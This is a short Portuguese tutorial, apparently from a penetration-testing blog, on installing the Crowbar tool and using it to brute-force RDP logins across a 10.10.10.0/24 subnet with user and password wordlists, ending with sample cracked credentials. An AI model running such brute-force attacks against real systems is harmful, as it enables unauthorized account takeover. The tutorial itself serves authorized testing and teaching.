O CROWBAR é uma ferramenta de força bruta muito útil durante um PenTest, de acordo com os desenvolvedores seu diferencial esta na utilização de chaves SSH que para atacar outros servidores SSH.
Projeto : github.com/galkan/crowbar
Baixe a versão mais atual utilizando o git.
Linuxgit clone https://github.com/galkan/crowbar
Entre no diretório crowbar e liste os arquivos.
Linuxcd crowbar ls -l
Crie um arquivo usuarios.txt e adicione alguns usuários que possivelmente possa existir nos equipamentos da rede.
Linuxvim usuarios.txt
Crie um arquivo senha.txt e adicione algumas senhas que possivelmente possam ser dos usuários existentes nos equipamentos da rede.
Linuxvim senhas.txt
Atribua a permissão 777 para o arquivo crowbar.py e visualize a permissão atribuída.
Linuxchmod 777 crowbar.py ls -l
Para que possa executar o crowbar.py algumas dependências são necessárias, basta instalar os pacotes a seguir:
Linuxapt-get install openvpn freerdp-x11 vncviewer
Execute os crowbar seguido dos parâmetros abaixo para realizar o brute force.
Linux./crowbar.py -b rdp -s 10.10.10.0/24 -U usuarios.txt -C senhas.txt -d
Dois novos arquivos serão gerados:
crowbar.log : Contém todas as tentativas de Usuários/Senhas realizados nos equipamentos.
crowbar.out : Contém os Equipamentos munidos dos Usuários/Senhas obtidos.
ls -l
Servidor: 10.10.10.20 – Usuário: Administrator – Senha: P@ssw0rd
Servidor: 10.10.10.140 – Usuário: 100security – Senha: 123456